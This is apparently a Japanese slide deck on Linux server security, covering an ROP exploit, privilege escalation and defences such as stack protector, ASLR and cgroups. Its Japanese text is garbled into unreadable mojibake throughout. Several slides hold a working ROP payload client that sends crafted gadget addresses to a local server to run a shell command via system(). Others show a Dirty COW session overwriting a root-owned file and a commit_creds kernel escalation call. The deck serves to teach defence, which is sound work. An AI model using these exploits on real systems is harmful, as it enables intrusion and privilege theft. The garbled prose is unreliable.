߈ܸऀ͕ࢦఆ͕ͨؔ͠
࣮ߦ͞Εͯ͠·ͬͨ
Slide 37
Slide 37 text
߈ܸऀαʔόͷίϯτϩʔϧΛखʹೖΕ͍ͨ
ͦͷͨΊʹshellΛىಈ͍ͨ͠
खͬऔΓૣ͘shellΛ্ཱͪ͛Δʹ
system("࣮ߦ͍ͨ͠ίϚϯυ");
ΛݺΕྑ͍
ҙͷؔΛݺΔ͚ͩͰͳ͘
ҙͷจࣈྻΛҾͱͯͤ͠Δඞཁ͕͋Δ
Slide 38
Slide 38 text
[1] System V Application Binary Interface AMD64 Architecture Processor Supplement
§3.5.7 Variable Argument Lists
x86_64 LinuxͰؔͷୈҰҾ
%rdiϨδελͰ͢͜ͱʹͳ͍ͬͯΔ[1]
࣮ߦ͍ͨ͠ίϚϯυΛϝϞϦʹॻ্͍ͨͰ
Կͱ͔ͯͦ͠ͷΞυϨεΛ%rdiʹͤͯ
retqͰؔΛݺͼग़͢ඞཁ͕͋Δ
rax rbp r8 r12
rbx rsp r9 r13
rcx rsi r10 r14
rdx rdi r11 r15
Slide 39
Slide 39 text
(gdb) disas _ZNSi6ignoreEl
…
0x00007ffff788dfc5 <+309>: pop %r14
0x00007ffff788dfc7 <+311>: retq
0x7ffff788dfc5
ඪ४ϥΠϒϥϦ͔Βpopͯ͠retq͍ͯ͠ΔॴΛ୳ͯ͘͠Δ
%r14ʹஔ͖͍ͨ
ͦͷޙʹ࣮ߦ͍ͨ͠ΞυϨε
ελοΫʹࠨͷΑ͏ʹॻ͍ͯretq͢Δͱ
%r14ʹҙͷΛஔ͘͜ͱ͕Ͱ͖Δ
Return Oriented Programming
ૢ࡞͍ͨ͠ϨδελΛpopͯ͠retq͍ͯ͠ΔॴΛݟ͚ͭΕ
ҙͷҾΛ͚ͭͯҙͷؔΛݺͼग़͢͜ͱ͕Ͱ͖Δ
Slide 40
Slide 40 text
#include
#include
int main() {
namespace asio = boost::asio;
using boost::asio::ip::tcp;
asio::io_service io_service;
tcp::socket socket(io_service);
socket.connect(
tcp::endpoint( asio::ip::address::from_string("127.0.0.1"), 20000 )
);
const std::vector< uint8_t > command{
't', 'o', 'u', 'c', 'h', ' ', 'a', 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
};
std::vector< uint8_t > data {
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00,
0xf2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x54, 0x1f, 0x93, 0xf7, 0xff, 0x7f, 0x00, 0x00,
0xa0, 0xd3, 0xff, 0xff, 0xff, 0x7f, 0x00, 0x00,
0x50, 0xd3, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00,
ࡉͨ͠σʔλΛૹΔΫϥΠΞϯτ
దͳϑΝΠϧΛ࡞
Slide 41
Slide 41 text
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00,
0xf2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x54, 0x1f, 0x93, 0xf7, 0xff, 0x7f, 0x00, 0x00,
0xa0, 0xd3, 0xff, 0xff, 0xff, 0x7f, 0x00, 0x00,
0x50, 0xd3, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00,
0xc0, 0xe5, 0x00, 0xf7, 0xff, 0x7f, 0x00, 0x00,
0x90, 0x3b, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00
};
for( size_t i = 0u; i != 10u; ++i )
std::copy( command.begin(), command.end(), std::back_inserter( data ) );
data.push_back( 0x0d );
data.push_back( 0x0a );
boost::system::error_code error;
asio::write(socket, asio::buffer(data), error);
return 0;
if( !error ) {
asio::streambuf receive_buffer;
asio::read_until(socket, receive_buffer, '\n', error);
std::cout << asio::buffer_cast(receive_buffer.data()) << std::endl;
}
}
ࡉͨ͠σʔλΛૹΔΫϥΠΞϯτ
Slide 42
Slide 42 text
tcp::socket socket(io_service);
socket.connect(
tcp::endpoint( asio::ip::address::from_string("127.0.0.1"), 20000 )
);
const std::vector< uint8_t > command{
't', 'o', 'u', 'c', 'h', ' ', 'a', 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
};
std::vector< uint8_t > data {
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00,
0xf2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x54, 0x1f, 0x93, 0xf7, 0xff, 0x7f, 0x00, 0x00,
0xa0, 0xd3, 0xff, 0xff, 0xff, 0x7f, 0x00, 0x00,
0x50, 0xd3, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00,
0xc0, 0xe5, 0x00, 0xf7, 0xff, 0x7f, 0x00, 0x00,
0x90, 0x3b, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00
};
for( size_t i = 0u; i != 10u; ++i )
std::copy( command.begin(), command.end(), std::back_inserter( data ) );
data.push_back( 0x0d );
ࡉͨ͠σʔλΛૹΔΫϥΠΞϯτ
QPQSEJͯ͠SFURͯ͠Δίʔυʹ
ඈͿͨΊͷΞυϨε
SEJʹͤΔ
࣮ߦ͍ͨ͠ίϚϯυ
system()
sync()
exit()
γΣϧεΫϦϓτ
Slide 43
Slide 43 text
$ ./pktgen
ΫϥΠΞϯτ αʔό
$ gdb -q ./tiny_server
Reading symbols from ./tiny_server...done.
(gdb) run
Starting program: /home/fadis/tiny_server
[Thread debugging using libthread_db
enabled]
Using host libthread_db library "/lib64/
libthread_db.so.1".
[Inferior 1 (process 11310) exited with
code 02]
(gdb) quit
$ ls
a tiny_server
ͳΜ͔Ͱ͖ͯΔ
Slide 44
Slide 44 text
߈ܸऀ͕αʔό্Ͱ
ҙͷૢ࡞Λग़དྷͯ͠·ͬͨ
Slide 45
Slide 45 text
߈ܸऀ͕࣮ߦͨ͠shell
߈ܸΛड͚ͨϓϩηεΛ࣮ߦͨ͠ϢʔβͷݖݶͰಈ͘
߈ܸΛड͚ͨϓϩηε͕
rootͰಈ͍͍ͯͳ͔ͬͨ߹
߈ܸऀαʔόͷશͳঠѲͷͨΊʹ
ݖݶঢ֨Λߦ͏ඞཁ͕͋Δ
Permission Denied
Slide 46
Slide 46 text
ݖݶঢ֨ʹ༻͍ΒΕΔ੬ऑੑͷྫ
https://dirtycow.ninja/
͜͜ʹ
%*35:$08ͷτοϓϖʔδΛషΔ
Slide 47
Slide 47 text
DIRTY COW(CVE-2016-5195)
mmap࣌ʹMAP_PRIVATEΛ͚ͭΔͱ
ϑΝΠϧʹର͢Δॻ͖ࠐΈΛ
ΦϦδφϧͷϑΝΠϧʹ
ॻ͔ͳ͍Α͏ʹ͢Δ͜ͱ͕Ͱ͖Δ
ॻ͖ࠐΈ
ಡΈग़͠
ϓϩηε͔Β
ݟͨϑΝΠϧ
ΦϦδφϧͷ
ϑΝΠϧ
ΞυϨεۭؒ
Slide 48
Slide 48 text
DIRTY COW(CVE-2016-5195)
ʮ͘Θͳ͍͔Βॻ͖ࠐΈͷ४උΛϝϞϦ͔ΒԼ͛ͯྑ͍ʯ
ࢦఆΛߦ͏ͷͱಉ࣌ʹॻ͖ࠐΈΛߦ͏ͱ
ΦϦδφϧͷϑΝΠϧʹॻ͍ͯ͠·͏ෆ۩߹
ΦϦδφϧͷϑΝΠϧʹ
ॻ͖ʹ͍ͬͯ͠·͏
ϓϩηε͔Β
ݟͨϑΝΠϧ
ΦϦδφϧͷ
ϑΝΠϧ
MADV_DONTNEEDͰ
ϝϞϦ͔ΒԼ͛Δ
Slide 49
Slide 49 text
DIRTY COW(CVE-2016-5195)
https://github.com/kcgthb/RHEL6.x-COW/blob/master/6.7/noc0w.patch
͜ͷෆ۩߹ࣗମෳࡶͳͷͰͳ͘मਖ਼ύονߦఔ
͜͜ʹ
%*35:$08ͷमਖ਼ύονΛషΔ
Slide 50
Slide 50 text
DIRTY COW(CVE-2016-5195)
root # echo 'abcde' >sample.txt
root # ls -lha sample.txt
-rw-r--r-- 1 root root 6 Mar 18 11:21 sample.txt
root # logout
non_root $ cat sample.txt
abcde
non_root $ ./dirtyc0w sample.txt ‘pwned'
mmap 7f214599a000
^C
non_root $ cat sample.txt
pwned
non_root $ ls -lha sample.txt
-rw-r--r-- 1 root root 6 3݄ 18 11:21 sample.txt
ҰൠϢʔβ͕
root͔͠ॻ͚ͳ͍ϑΝΠϧΛ
ॻ͖͑ͯ͠·ͬͨ
͜Ε͕ՄೳͳΒrootϩάΠϯͷೝূΛແ͘͢͜ͱͩͬͯग़དྷΔ
Slide 51
Slide 51 text
CVE-2017-15265
ALSA Sequencer[1]ͷϙʔτΛ࡞͙ͬͯ͢ʹഁغ͢Δ
[1] ALSA Sequencer http://www.alsa-project.org/~frank/alsa-sequencer/index.html
Ϣʔβۭؒ Χʔωϧۭؒ
ϙʔτ͍ͩ͘͞
Ͳ͏ͧ
ϙʔτͷͨΊͷ
ྖҬͷ֬อ
ϙʔτΛॳظԽ
εϨου1 εϨου1
ϙʔτ͏͍͍ ϙʔτͷͨΊͷ
ྖҬͷղ์
εϨου2 εϨου2
͠Α͏ͱࢥͬͨΒ
ແ͔ͬͨ
Slide 52
Slide 52 text
͜͜ʹ
-JOVYΧʔωϧͷ
"-4"4FRVFODFSͷॳظԽதͰ
ίʔϧόοΫΛಡΜͰ͍ΔՕॴΛషΔ
Use After Free
ΧʔωϧͷߏମʹଟͷίʔϧόοΫ͕ؔઃఆ͞Ε͍ͯΔ
ղ์ࡁΈͷϝϞϦಉαΠζͷϝϞϦΛ֬อ͢Δͱ
ߴ֬Ͱಉ͡ྖҬΛऔಘͰ͖Δ
ίʔϧόοΫΛҙͷΞυϨεʹॻ͖͑ͯΧʔωϧʹݺͤΔ
https://elixir.bootlin.com/linux/v4.15.10/source/sound/core/seq/seq_clientmgr.c#L619
ϙʔτ͏ղ์͞ΕͯΔ͚Ͳ
͜͜Ͱϙʔτʹઃఆ͞Εͨ
ίʔϧόοΫΛݺΜͰΔ
Slide 53
Slide 53 text
Use After Free
͜ΕΛར༻ͯ͠ԿΛݺͤΔ͔
ͦΕͪΖΜ
commit_creds( prepare_kernel_cred( NULL ) );
༁ԶΛrootʹ͠Ζ
ղ์ࡁΈͷྖҬ͔ΒίʔϧόοΫΛݺͿঢ়ଶʹ͑͞Ͱ͖Ε
͜ͷ߈ཱܸ͕͢ΔՄೳੑ͕͋ΔͨΊ
Use After FreeΛͬͨݖݶঢ֨੬ऑੑසൟʹݟ͔ͭΔ
Slide 54
Slide 54 text
Use After Free
$7&
$7&
$7&
ղ์ࡁΈͷྖҬ͔ΒίʔϧόοΫΛݺͿঢ়ଶʹ͑͞Ͱ͖Ε
͜ͷ߈ཱܸ͕͢ΔՄೳੑ͕͋ΔͨΊ
Use After FreeΛͬͨݖݶঢ֨੬ऑੑසൟʹݟ͔ͭΔ
$7&
$7&
$7&
$7&
Slide 55
Slide 55 text
߈ܸऀ͕αʔόΛ
શʹঠѲͯ͠͠·ͬͨ
Slide 56
Slide 56 text
ࠣࡉͳෆ۩߹͕
͠͠αʔόͷ
ηΩϡϦςΟΛແ͠ʹ͢Δ
Slide 57
Slide 57 text
Ұ൪ྑ͍ͷෆ۩߹͕ແ͍ࣄ͕ͩ
ͦ͏͍ͬͯෆ۩߹ग़ͯ͘ΔͷͰ
ෆ۩߹ग़Δͷͱͯ͠
ग़དྷΔ͚ͩக໋తͳ߈ܸʹ݁ͤ͞ͳ͍ҝͷ
ରॲΛߦ͏ඞཁ͕͋Δ
Slide 58
Slide 58 text
TUBDLQSPUFDUPS
f:
push %rbp
mov %rsp,%rbp
sub $0x20,%rsp
mov %edi,-0x14(%rbp)
mov %esi,-0x18(%rbp)
mov %fs:0x28,%rax
mov %rax,-0x8(%rbp)
xor %eax,%eax
mov -0x14(%rbp),%edx
mov -0x18(%rbp),%eax
add %edx,%eax
mov -0x8(%rbp),%rcx
xor %fs:0x28,%rcx
je 40055f
callq 400400 <__stack_chk_fail@plt>
leaveq
retq
f:
push %rbp
mov %rsp,%rbp
mov %edi,-0x4(%rbp)
mov %esi,-0x8(%rbp)
mov -0x4(%rbp),%edx
mov -0x8(%rbp),%eax
add %edx,%eax
pop %rbp
retq
͋Δ࣌
ͳ͍࣌
gccͷ࠷దԽΦϓγϣϯͷ1ͭ
ͳΜ͔
૿͑ͯΔ
Slide 59
Slide 59 text
TUBDLQSPUFDUPS
f:
push %rbp
mov %rsp,%rbp
sub $0x20,%rsp
mov %edi,-0x14(%rbp)
mov %esi,-0x18(%rbp)
mov %fs:0x28,%rax
mov %rax,-0x8(%rbp)
xor %eax,%eax
mov -0x14(%rbp),%edx
mov -0x18(%rbp),%eax
add %edx,%eax
mov -0x8(%rbp),%rcx
xor %fs:0x28,%rcx
je 40055f
callq 400400 <__stack_chk_fail@plt>
leaveq
retq
͋ΔݻఆͷΞυϨε͔ΒಡΜͩΛ
ελοΫʹੵΉ
ઌఔͱಉ͡ΞυϨε͔ΒಡΜͩͱ
ελοΫͷΛൺֱ͠
Ұக͠ͳ͔ͬͨΒabort͢Δ
Slide 60
Slide 60 text
TUBDLQSPUFDUPS
ؔgͷม
ؔgͷม
ؔgͷม
ؔf͕ऴΘͬͨΒΔҐஔ
ؔfͷม
ؔfͷม
ؔgͷSCQ
ϥϯμϜͳ
όοϑΝΦʔόʔϥϯͰ
returnΞυϨεΛॻ͖͑Δʹ
͜͜·Ͱॻ͖ࠐΉඞཁ͕͋Δ
ؒʹڬ·͍ͬͯΔ
͜ͷΛॻ͖͑ͯ͠·͏ͱ
ϓϩάϥϜҟৗऴྃ͢Δ
όοϑΝΦʔόʔϥϯΛར༻ͨ͠
ҙͷίʔυͷ࣮ߦ͕ͱͯ͘͠ͳΔ
Slide 61
Slide 61 text
TUBDLQSPUFDUPS
xor %eax,%eax
mov -0x14(%rbp),%edx
mov -0x18(%rbp),%eax
add %edx,%eax
mov -0x8(%rbp),%rcx
xor %fs:0x28,%rcx
je 40055f
callq 400400 <__stack_chk_fail@plt>
leaveq
retq
ઌఔͱಉ͡ΞυϨε͔ΒಡΜͩͱ
ελοΫͷΛൺֱ͠
Ұக͠ͳ͔ͬͨΒabort͢Δ
ελοΫ͕ഁյ͞ΕͨޙͳͷͰ
ຊདྷͷॲཧʹΔ͜ͱͰ͖ͳ͍
stack-protector
߈ܸऀ͕ҙͷίʔυΛ࣮ߦͰ͖Δ੬ऑੑΛ
߈ܸऀ͕DoS߈ܸΛͰ͖Δ੬ऑੑʹऑΊΔ
Slide 62
Slide 62 text
͜͜ʹ
3FE)BUʹΑΔ#MVFCPSOFͷղઆΛషΔ
https://access.redhat.com/security/vulnerabilities/blueborne
࣮ࡍʹTUBDLQSPUFDUPS͕ʹཱ͍ͬͯΔέʔε
Blueborne(CVE-2017-1000251)
γεςϜʹBluetoothͰଓͰ͖Δೝূ͞Ε͍ͯͳ͍Ϣʔβ͕
γεςϜΛΫϥογϡͤ͞Δࣄ͕Ͱ͖Δ
͋Δ͍stack protector͕༗ޮʹͳ͍ͬͯͳ͍߹
ҙͷίʔυ͕࣮ߦ͞ΕΔՄೳੑ͕͋Δ
Slide 63
Slide 63 text
TUBDLQSPUFDUPS
stack protectorελοΫΛগ͠༨ʹ͍
ϝϞϦΞΫηεͱൺֱ͕༨ʹൃੜ͢Δ
-fno-stack-protector(σϑΥϧτ)
-fstack-protector(͓͢͢Ί)
-fstack-protector-all
stack protectorΛֻ͚ͳ͍
όΠτҎ্ͷจࣈྻΛѻ͏ؔʹstack protectorΛֻ͚Δ
͋ΒΏΔؔʹstack protectorΛֻ͚Δ
ֻ͚͓ͯ͘ͱʹཱͭͱ͜Ζ͚ͩʹֻ͚͓͖͍ͯͨ
Slide 64
Slide 64 text
TUBDLQSPUFDUPS
stack protector
ελοΫ্ͰͷϝϞϦഁյΛݕ͢Δ
όοϑΝΦʔόʔϥϯ͕ώʔϓ্ͳͲͷ
ελοΫҎ֎ͷॴͰى͜Γ
ͦΕʹΑͬͯഁյ͞ΕͨΞυϨεʹδϟϯϓ͕Մೳͳ߹
stack protector߈ܸΛ͙ࣄ͕Ͱ͖ͳ͍
Slide 65
Slide 65 text
address space layout randomization
$ cat /proc/self/maps
00400000-00407000 r-xp 00000000 08:03 35724749 /bin/cat
…
00608000-00629000 rw-p 00000000 00:00 0 [heap]
7f9e54cd8000-7f9e5b63d000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive
7f9e5b63d000-7f9e5b7cc000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so
…
7ffeb0a50000-7ffeb0a72000 rw-p 00000000 00:00 0 [stack]
7ffeb0b87000-7ffeb0b89000 r--p 00000000 00:00 0 [vvar]
7ffeb0b89000-7ffeb0b8b000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
$ cat /proc/self/maps
00400000-00407000 r-xp 00000000 08:03 35724749 /bin/cat
…
00608000-00629000 rw-p 00000000 00:00 0 [heap]
7f5e24988000-7f5e2b2ed000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive
7f5e2b2ed000-7f5e2b47c000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so
…
7fffe276e000-7fffe2790000 rw-p 00000000 00:00 0 [stack]
7fffe27c2000-7fffe27c4000 r--p 00000000 00:00 0 [vvar]
7fffe27c4000-7fffe27c6000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
ϓϩηεΛىಈ͢ΔͨͼʹϝϞϦϨΠΞτΛม͑Δ
1ճ
2ճ
Slide 66
Slide 66 text
address space layout randomization
$ cat /proc/self/maps
00400000-00407000 r-xp 00000000 08:03 35724749 /bin/cat
…
00608000-00629000 rw-p 00000000 00:00 0 [heap]
7f9e54cd8000-7f9e5b63d000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive
7f9e5b63d000-7f9e5b7cc000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so
…
7ffeb0a50000-7ffeb0a72000 rw-p 00000000 00:00 0 [stack]
7ffeb0b87000-7ffeb0b89000 r--p 00000000 00:00 0 [vvar]
7ffeb0b89000-7ffeb0b8b000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
$ cat /proc/self/maps
00400000-00407000 r-xp 00000000 08:03 35724749 /bin/cat
…
00608000-00629000 rw-p 00000000 00:00 0 [heap]
7f5e24988000-7f5e2b2ed000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive
7f5e2b2ed000-7f5e2b47c000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so
…
7fffe276e000-7fffe2790000 rw-p 00000000 00:00 0 [stack]
7fffe27c2000-7fffe27c4000 r--p 00000000 00:00 0 [vvar]
7fffe27c4000-7fffe27c6000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
ϓϩηεΛىಈ͢ΔͨͼʹϝϞϦϨΠΞτΛม͑Δ
1ճ
2ճ
ελοΫͷΞυϨε͕࣮ߦ͢ΔͨͼʹมԽ͍ͯ͠Δ
7ffeb0a50000-7ffeb0a72000
7fffe276e000-7fffe2790000
system()ʹ͢ҝʹॻ͖ࠐΜͩ
γΣϧεΫϦϓτͷΞυϨε͕ຖճมΘΔҝ
εΫϦϓτͷ࣮ߦ͕ͱͯ͘͠ͳΔ
Slide 67
Slide 67 text
address space layout randomization
$ cat /proc/self/maps
00400000-00407000 r-xp 00000000 08:03 35724749 /bin/cat
…
00608000-00629000 rw-p 00000000 00:00 0 [heap]
7f9e54cd8000-7f9e5b63d000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive
7f9e5b63d000-7f9e5b7cc000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so
…
7ffeb0a50000-7ffeb0a72000 rw-p 00000000 00:00 0 [stack]
7ffeb0b87000-7ffeb0b89000 r--p 00000000 00:00 0 [vvar]
7ffeb0b89000-7ffeb0b8b000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
$ cat /proc/self/maps
00400000-00407000 r-xp 00000000 08:03 35724749 /bin/cat
…
00608000-00629000 rw-p 00000000 00:00 0 [heap]
7f5e24988000-7f5e2b2ed000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive
7f5e2b2ed000-7f5e2b47c000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so
…
7fffe276e000-7fffe2790000 rw-p 00000000 00:00 0 [stack]
7fffe27c2000-7fffe27c4000 r--p 00000000 00:00 0 [vvar]
7fffe27c4000-7fffe27c6000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
ϓϩηεΛىಈ͢ΔͨͼʹϝϞϦϨΠΞτΛม͑Δ
1ճ
2ճ
ϥΠϒϥϦͷஔ࣮ߦ͢ΔͨͼʹมԽ
7f9e5b63d000-7f9e5b7cc000
7f5e2b2ed000-7f5e2b47c000
system()͕ஔ͔Ε͍ͯΔΞυϨε
ϥϯμϜʹมԽ͢Δҝ
ҙͷίʔυͷ࣮ߦ͕ͱͯ͘͠ͳΔ
Slide 68
Slide 68 text
$ gdb -q ./tiny_server
Reading symbols from ./tiny_server...done.
(gdb) set disable-randomization off
(gdb) run
Starting program: /home/fadis/tiny_server_test/tiny_server
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7931f54 in ?? ()
(gdb) backtrace
#0 0x00007ffff7931f54 in ?? ()
#1 0x00007fffffffd3a0 in ?? ()
#2 0x00007ffff6f6d350 in ?? ()
#3 0x00007ffff700e5c0 in ?? ()
#4 0x00007ffff6f63b90 in ?? ()
#5 0x0061206863756f74 in ?? ()
#6 0x0000000000000000 in ?? ()
(gdb) p &system
$1 = ( *) 0x7f51c76cd350
(gdb) disas 0x7ffff7931f54
No function contains specified address.
ઌఔγΣϧͷ࣮ߦʹޭͨ͠ྫΛASLR༗ΓͰߦͳͬͨ߹
Slide 69
Slide 69 text
$ gdb -q ./tiny_server
Reading symbols from ./tiny_server...done.
(gdb) set disable-randomization off
(gdb) run
Starting program: /home/fadis/tiny_server_test/tiny_server
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7931f54 in ?? ()
(gdb) backtrace
#0 0x00007ffff7931f54 in ?? ()
#1 0x00007fffffffd3a0 in ?? ()
#2 0x00007ffff6f6d350 in ?? ()
#3 0x00007ffff700e5c0 in ?? ()
#4 0x00007ffff6f63b90 in ?? ()
#5 0x0061206863756f74 in ?? ()
#6 0x0000000000000000 in ?? ()
(gdb) p &system
$1 = ( *) 0x7f51c76cd350
(gdb) disas 0x7ffff7931f54
No function contains specified address.
ઌఔγΣϧͷ࣮ߦʹޭͨ͠ྫΛASLR༗ΓͰߦͳͬͨ߹
system()͕ظͨ͠ΞυϨεͱҟͳΔॴʹஔ͞Ε͍ͯΔ
0x00007ffff6f6d350
0x7f51c76cd350
ASLRແ͠ͷ߹ʹsystem()͕ஔ͍ͯ͋ͬͨॴ
࣮ࡍʹsystem()͕
ஔ͞Ε͍ͯͨॴ
Slide 70
Slide 70 text
$ gdb -q ./tiny_server
Reading symbols from ./tiny_server...done.
(gdb) set disable-randomization off
(gdb) run
Starting program: /home/fadis/tiny_server_test/tiny_server
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7931f54 in ?? ()
(gdb) backtrace
#0 0x00007ffff7931f54 in ?? ()
#1 0x00007fffffffd3a0 in ?? ()
#2 0x00007ffff6f6d350 in ?? ()
#3 0x00007ffff700e5c0 in ?? ()
#4 0x00007ffff6f63b90 in ?? ()
#5 0x0061206863756f74 in ?? ()
#6 0x0000000000000000 in ?? ()
(gdb) p &system
$1 = ( *) 0x7f51c76cd350
(gdb) disas 0x7ffff7931f54
No function contains specified address.
ઌఔγΣϧͷ࣮ߦʹޭͨ͠ྫΛASLR༗ΓͰߦͳͬͨ߹
ͦΕҎલʹ࠷ॳʹpop %rdi͢Δҝͷίʔυย͕
ظͨ͠ॴʹͳ͍
0x00007ffff7931f54
No function contains specified address
ASLRແ͠ͷ߹ʹpop %rdiͱretq͕͋ͬͨॴ
ͦ͜ʹؔແ͍
Slide 71
Slide 71 text
$ gdb -q ./tiny_server
Reading symbols from ./tiny_server...done.
(gdb) set disable-randomization off
(gdb) run
Starting program: /home/fadis/tiny_server_test/tiny_server
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7931f54 in ?? ()
(gdb) backtrace
#0 0x00007ffff7931f54 in ?? ()
#1 0x00007fffffffd3a0 in ?? ()
#2 0x00007ffff6f6d350 in ?? ()
#3 0x00007ffff700e5c0 in ?? ()
#4 0x00007ffff6f63b90 in ?? ()
#5 0x0061206863756f74 in ?? ()
#6 0x0000000000000000 in ?? ()
(gdb) p &system
$1 = ( *) 0x7f51c76cd350
(gdb) disas 0x7ffff7931f54
No function contains specified address.
ઌఔγΣϧͷ࣮ߦʹޭͨ͠ྫΛASLR༗ΓͰߦͳͬͨ߹
ͦͷ݁Ռ
ԿׂΓͯΒΕ͍ͯͳ͍ϝϞϦʹretqͰඈ΅͏ͱͯ͠
ൣғ֎ࢀরͰϓϩηε͕ఀࢭͨ͠
߈ܸऀ͕ҙͷίʔυΛ࣮ߦͰ͖Δ੬ऑੑΛ
߈ܸऀ͕DoS߈ܸΛͰ͖Δ੬ऑੑʹऑΊΔࣄ͕Ͱ͖ͨ
Slide 72
Slide 72 text
LinuxͷίϯςφΛ׆༻ͤΑ
Slide 73
Slide 73 text
ϓϩηεͱࢠϓϩηε
ϓϩηεத͔ΒผͷϓϩηεΛ্ཱͪ͛Δͱ
ͦͷϓϩηεݩͷϓϩηεͷࢠʹͳΔ
ϓϩηε
/bin/ls
execl("/bin/ls","/bin/ls",nullptr );
ىಈ
ϓϩηε
ࢠϓϩηε
Slide 74
Slide 74 text
init!"!5*[agetty]
#!busybox
#!login!!!bash!!!top
#!sshd!"!sshd!!!sshd!!!bash!!!pstree
$ %!sshd!!!sshd!!!bash!!!vim
%!udevd
γεςϜىಈ࣌ʹ࣮ߦ͞ΕΔ
initҎ֎ͷશͯͷϓϩηε
init͔ΒḷΕΔࢠؔͷͲ͔͜ʹͿΒԼ͕͍ͬͯΔ
initͷࢠͷ
sshd͔Βىಈ͞Εͨ
bash͔Βىಈ͞Εͨ
vim
ϓϩηεͱࢠϓϩηε
Slide 75
Slide 75 text
init!"!5*[agetty]
#!busybox
#!login!!!bash!!!top
#!sshd!"!sshd!!!sshd!!!bash!!!pstree
$ %!sshd!!!sshd!!!bash!!!vim
%!udevd
ࢦఆͨ͠ϓϩηεͱ͔ͦ͜Βੜ·Εͨࢠϓϩηεʹ
γεςϜͷϦιʔεͷ༻ʹؔ͢Δ੍ݶΛઃఆ͢Δ
cgroups
ྫ:
͜ͷൣғͷϓϩηε
1൪ͷCPU͔͠
͍͚ͬͯͳ͍
(cpuset cgroup)
Slide 76
Slide 76 text
ϒϩοΫI/O cgroup
ࢦఆͨ͠ϓϩηεάϧʔϓ͔Βͷ
ϒϩοΫσόΠεͷI/OΛ੍ݶ͢Δ
͜ͷάϧʔϓͷϓϩηε
ͲΜͳʹετϨʔδʹ༨ྗ͕͋ͬͯ
ࢦఆ͞ΕͨҎ্ͷI/OଳҬΛ͑ͳ͍
߹ܭ.CQT੍ݶ
Slide 77
Slide 77 text
ະ༻
CPU cgroup
ࢦఆͨ͠ϓϩηεάϧʔϓ͔Βͷ
CPUͷ༻Λ੍ݶ͢Δ
͜ͷάϧʔϓͷϓϩηε
ͲΜͳʹCPUʹ༨ྗ͕͋ͬͯ
ࢦఆ͞ΕͨҎ্ʹ
CPUΛ͏ࣄͰ͖ͳ͍
߹ܭ੍ݶ
Slide 78
Slide 78 text
cgroups
ଞʹϝϞϦͷ༻HugeTLBͷׂΓͯͷ੍ݶͳͲ͕
උΘ͍ͬͯΔ͕
੬ऑੑ߈ܸʹର͢Δඋ͑ͱ͖ͯ͢͠ͳͷ
pids devices
ͱ
Slide 79
Slide 79 text
PIDs cgroups
